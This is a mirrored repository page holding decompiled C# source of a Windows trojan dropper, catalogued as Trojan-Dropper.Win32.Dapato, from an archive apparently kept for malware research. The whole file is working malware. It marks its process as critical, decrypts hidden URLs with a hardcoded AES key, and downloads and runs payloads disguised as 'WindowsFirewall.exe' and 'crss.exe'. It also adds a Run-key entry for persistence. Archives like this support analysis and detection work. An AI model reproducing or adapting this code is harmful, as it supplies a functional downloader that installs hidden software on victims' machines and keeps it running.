ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-21 10:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.bfcm-c01557638a82910361f2149b9432ad8f42d2d17a53d31917bcdb34e91acc08e6/vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

63 lines
2.8 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
// Assembly: Downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8B96CE03-B080-4512-8CC1-7DDE95F54AAA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.bfcm-c01557638a82910361f2149b9432ad8f42d2d17a53d31917bcdb34e91acc08e6.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
internal static class vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ
{
[DllImport("ntdll")]
private static extern int NtSetInformationProcess(IntPtr p, int c, ref int i, int l);
public static void Main()
{
int i1 = 1;
vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i1, 4);
try
{
string fileName = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\WindowsFirewall.exe";
new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9DovkArANHKiv+rqzid4MVJn5b"), fileName);
Process.Start(fileName);
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
}
catch
{
}
try
{
string fileName = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\crss.exe";
new WebClient().DownloadFile(vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.ÍƾYjƔơƻƄT("K4grycAwDMKvf6NsgqFQJA5PuoMdteIUZs7xA+9Dovl1hmWyr2yTB16aQjN0YI1t"), fileName);
Process.Start(fileName);
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Client Runtime Service", (object) fileName);
}
catch
{
}
int i2 = 0;
vƁcƔaWiƙavhƴƀÀǎƳռƾJOzǥCÇ.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i2, 4);
}
private static string ÍƾYjƔơƻƄT(string ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ)
{
RijndaelManaged rijndaelManaged = new RijndaelManaged();
MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider();
byte[] destinationArray = new byte[32];
byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes("u y"));
Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16);
rijndaelManaged.Key = destinationArray;
rijndaelManaged.Mode = CipherMode.ECB;
ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(ƋLƉnhCƕaƻưƗȞƙnƘռyƁzռPƉÂ);
return Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
}
Reference in New Issue View Git Blame Copy Permalink